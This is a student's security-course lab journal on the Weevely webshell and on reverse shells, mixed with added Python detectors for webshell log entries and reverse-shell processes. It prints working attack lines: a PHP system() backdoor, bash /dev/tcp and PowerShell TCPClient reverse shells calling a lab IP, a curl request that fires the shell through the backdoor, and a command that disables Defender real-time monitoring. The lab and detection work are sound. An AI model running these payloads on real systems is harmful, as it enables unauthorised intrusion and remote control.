Class Activity 8.1 & 8.2 - Snowboundport37/champlain GitHub Wiki

SEC335 - Technical Journal

Class Activity 8.1 - Weevely & Reverse Shells

📌 Overview

In this lab, we explored Weevely, a PHP-based webshell that allows command execution on a remote server. The goal was to upload a backdoor to the Pippen server, establish a connection, and analyze traffic using Wireshark.


🔧 Steps Performed

Step 1: Uploading the Webshell

  1. SSH into Pippen
    ssh [email protected]
    
  2. Create a simple PHP backdoor:
    echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php
    chmod 755 /var/www/html/shell.php
    
  3. Restart Apache to ensure the file is accessible:
    systemctl restart httpd
    

Step 2: Establishing a Weevely Connection

  1. Generate a Weevely agent on Kali:
    weevely generate strongpassword weevely.php
    
  2. Upload the weevely.php to the target server.
  3. Connect using Weevely:
    weevely http://10.0.5.25/weevely.php strongpassword
    
  4. Verify connection:
    whoami
    pwd
    

Step 3: Capturing Traffic with Wireshark

  1. Open Wireshark.
  2. Apply a display filter:
    http.request.method == "GET"
    
  3. Capture the request when executing a command like whoami.
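The Wireshark filter above shows the webshell request on the wire; the same request also lands in the web server's access log, which is where a defender would look for it after the fact. The script below is an added example (not part of this journal and not Weevely's or the lab's code): it parses constructed Apache combined-format log lines, extracts the query string, and flags requests that pass a command through a parameter such as cmd, contain a /dev/tcp reverse-shell pattern, or hit a PHP file that is not in a known inventory of application scripts. The log lines, the inventory and the parameter names are assumptions.

```python
"""Flag web requests that look like command execution through a PHP web shell.

Added example, not part of the original journal. Parses constructed Apache
combined-format access log lines and reports requests whose query string carries
a shell command, or that target a PHP script outside the known inventory.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines; the hosts, paths and timestamps are assumptions.
SAMPLE_LOG = """\
10.0.17.45 - - [12/Mar/2025:14:02:11 -0400] "GET /index.php HTTP/1.1" 200 512
10.0.17.45 - - [12/Mar/2025:14:02:40 -0400] "GET /shell.php?cmd=whoami HTTP/1.1" 200 28
10.0.17.45 - - [12/Mar/2025:14:03:05 -0400] "GET /shell.php?cmd=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.17.45%2F4449%200%3E%261 HTTP/1.1" 200 0
10.0.5.30 - - [12/Mar/2025:14:04:19 -0400] "GET /search.php?q=snowboard HTTP/1.1" 200 2048
10.0.17.45 - - [12/Mar/2025:14:05:00 -0400] "POST /weevely.php HTTP/1.1" 200 145
"""

# Apache combined format: client, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# PHP scripts that legitimately belong to the application (assumption: an inventory
# taken from a clean deployment). Anything else under .php is worth a look.
KNOWN_SCRIPTS = {"/index.php", "/search.php"}
# Parameter names commonly used by one-line PHP shells to receive a command.
COMMAND_PARAMS = {"cmd", "c", "exec", "command"}
# Substrings that mean the value is a reverse shell rather than a single command.
REVERSE_SHELL_MARKERS = ("/dev/tcp/", "/bin/sh", "bash -i")


def parse_line(line):
    """Return a dict with source, path and decoded query parameters, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs splits on the raw '&' first and then percent-decodes each value,
    # so an encoded %26 inside a command survives as part of that command.
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the reasons a parsed request looks like web shell use (empty if none)."""
    reasons = []
    if rec["path"].endswith(".php") and rec["path"] not in KNOWN_SCRIPTS:
        reasons.append(f"request to PHP script not in inventory: {rec['path']}")
    for name, values in rec["params"].items():
        if name.lower() not in COMMAND_PARAMS:
            continue
        for value in values:
            reasons.append(f"command parameter {name}={value!r}")
            if any(marker in value for marker in REVERSE_SHELL_MARKERS):
                reasons.append("reverse-shell pattern in command value")
            if re.search(r"[;|&`$<>]", value):
                reasons.append("shell metacharacters in command value")
    return reasons


def scan(log_text):
    """Run every line through parse_line/classify and collect the suspicious ones."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({"src": rec["src"], "path": rec["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['src']} {f['path']}")
        for reason in f["reasons"]:
            print(f"    - {reason}")
```

The inventory check is the one that catches the Weevely agent: its traffic does not carry a readable cmd parameter, so only the fact that weevely.php is not a file the application shipped with gives it away in the access log.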

Challenges Faced & Solutions

  • Weevely session failed → Fixed by ensuring correct permissions & using chmod 755.
  • No response from shell.php → Resolved by restarting Apache (systemctl restart httpd).

📸 Screenshots Captured:

  • Wireshark traffic capture.

Class Activity 8.2 - Reverse Shells

📌 Overview

This lab focused on various reverse shell techniques, including Bash, Netcat, Python, and PowerShell reverse shells, and capturing them using Wireshark.


🔧 Steps Performed

Step 1: Bash Reverse Shell on Linux

  1. Identify Kali’s IP:
    ip a | grep eth0
    
    Example output: 10.0.17.45
  2. Setup a Netcat Listener on Kali:
    nc -lnvp 4449
    
  3. Execute Reverse Shell from Target (Rocky Linux):
    bash -i >& /dev/tcp/10.0.17.45/4449 0>&1
    
  4. Confirm access:
    whoami
    

Step 2: Reverse Shell on Pippen

  1. Upload backdoor to Pippen:
    echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/revshell.php
    chmod 755 /var/www/html/revshell.php
    
  2. Invoke reverse shell using curl:
    curl "http://10.0.5.25/revshell.php?cmd=bash -i >& /dev/tcp/10.0.17.45/4449 0>&1"
    

Step 3: PowerShell Reverse Shell on Windows

  1. Disable Windows Defender:
    Set-MpPreference -DisableRealtimeMonitoring $true
    
  2. Setup a Netcat Listener on Kali:
    nc -lnvp 4449
    
  3. Run PowerShell Reverse Shell:
    powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.45',4449); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
    
  4. Confirm connection:
    whoami
    

Step 4: Capturing Traffic in Wireshark

  1. Set Wireshark filter:
    tcp.port == 4449
    
  2. Capture a command execution (whoami).
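The tcp.port filter finds the session once you know the port; on the host side the same three techniques used in this lab (bash's /dev/tcp redirection, the PowerShell TCPClient one-liner, and the Set-MpPreference call that precedes it) each leave a distinctive process record. The script below is an added example (not part of this journal and not a tool from the lab): it applies host-based detection rules to a constructed process snapshot of the kind an EDR or a ps/ss listing would give, and reports which records match. Hostnames, PIDs, the web service account name (apache is the Rocky Linux httpd default) and the abbreviated PowerShell command line are assumptions.

```python
"""Flag process records that match the reverse-shell techniques used in this lab.

Added example, not part of the original journal. Applies host-based rules to a
constructed process snapshot; hostnames, PIDs, users and command lines are
assumptions chosen to mirror the lab steps.
"""
import re

SHELLS = {"bash", "sh", "dash", "zsh"}
# Accounts a web server typically runs as (assumption: 'apache' for Rocky Linux httpd).
WEB_SERVICE_ACCOUNTS = {"apache", "www-data", "nginx"}

# Constructed snapshot: host, pid, user, executable name, full command line, and the
# remote endpoint of any TCP socket the process holds (None when it holds no socket).
SNAPSHOT = [
    {"host": "pippen", "pid": 2310, "user": "apache", "comm": "sh",
     "cmdline": "sh -c bash -i >& /dev/tcp/10.0.17.45/4449 0>&1", "remote": None},
    {"host": "pippen", "pid": 2311, "user": "apache", "comm": "bash",
     "cmdline": "bash -i", "remote": "10.0.17.45:4449"},
    {"host": "pippen", "pid": 1020, "user": "apache", "comm": "httpd",
     "cmdline": "/usr/sbin/httpd -DFOREGROUND", "remote": "10.0.5.30:51822"},
    {"host": "pippen", "pid": 2400, "user": "student", "comm": "bash",
     "cmdline": "-bash", "remote": None},
    {"host": "win-ws", "pid": 5120, "user": "student", "comm": "powershell.exe",
     "cmdline": "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.17.45',4449); "
                "$stream = $client.GetStream(); ... $sendback = (iex $data 2>&1 | Out-String); ...\"",
     "remote": "10.0.17.45:4449"},
    {"host": "win-ws", "pid": 5080, "user": "student", "comm": "powershell.exe",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true", "remote": None},
]


def indicators(proc):
    """Return the detection rules a single process record triggers (empty if benign)."""
    hits = []
    comm = proc["comm"].lower()
    cmd = proc["cmdline"].lower()
    is_shell = comm in SHELLS
    is_powershell = comm.startswith("powershell") or comm == "pwsh"

    # Rule 1: bash's /dev/tcp pseudo-device redirects the shell's stdio to a socket;
    # no legitimate service script needs that on an interactive shell.
    if is_shell and "/dev/tcp/" in cmd:
        hits.append("shell stdio redirected to /dev/tcp")

    # Rule 2: a web-server account serves requests; an interactive shell under that
    # account holding an outbound TCP socket is the signature of webshell -> reverse shell.
    if is_shell and proc["user"] in WEB_SERVICE_ACCOUNTS and proc["remote"]:
        hits.append(f"shell under web service account '{proc['user']}' connected to {proc['remote']}")

    # Rule 3: PowerShell wiring a TCP stream into iex / Invoke-Expression is the one-liner
    # used in Step 3, regardless of the address and port it was given.
    if (is_powershell and "tcpclient" in cmd and "getstream" in cmd
            and re.search(r"\biex\b|invoke-expression", cmd)):
        hits.append("PowerShell TCP client feeding Invoke-Expression")

    # Rule 4: turning off real-time protection is tampering that precedes the payload,
    # and is itself worth an alert.
    if is_powershell and "set-mppreference" in cmd and "disablerealtimemonitoring" in cmd:
        hits.append("Defender real-time monitoring disabled")

    return hits


def scan(snapshot):
    """Return (host, pid, hits) for every process that triggers at least one rule."""
    findings = []
    for proc in snapshot:
        hits = indicators(proc)
        if hits:
            findings.append((proc["host"], proc["pid"], hits))
    return findings


if __name__ == "__main__":
    for host, pid, hits in scan(SNAPSHOT):
        print(f"{host} pid {pid}: " + "; ".join(hits))
```

Rule 2 is the one that does not depend on the command line at all, which matters because the bash child spawned by the PHP system() call shows up simply as "bash -i"; the socket it inherited and the account it runs under are what give it away.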

Challenges Faced & Solutions

  • PowerShell blocked execution → Disabled AV using Set-MpPreference -DisableRealtimeMonitoring $true.
  • Netcat not found on Pippen → Used a Bash reverse shell instead.

📸 Screenshots Captured:

  • Successful reverse shell on Kali.

  • Wireshark TCP stream capture.


Reflections & Learnings

  • The importance of privilege escalation in post-exploitation.
  • How defensive security tools (e.g., Windows Defender) block attacks.
  • Real-world network traffic analysis using Wireshark.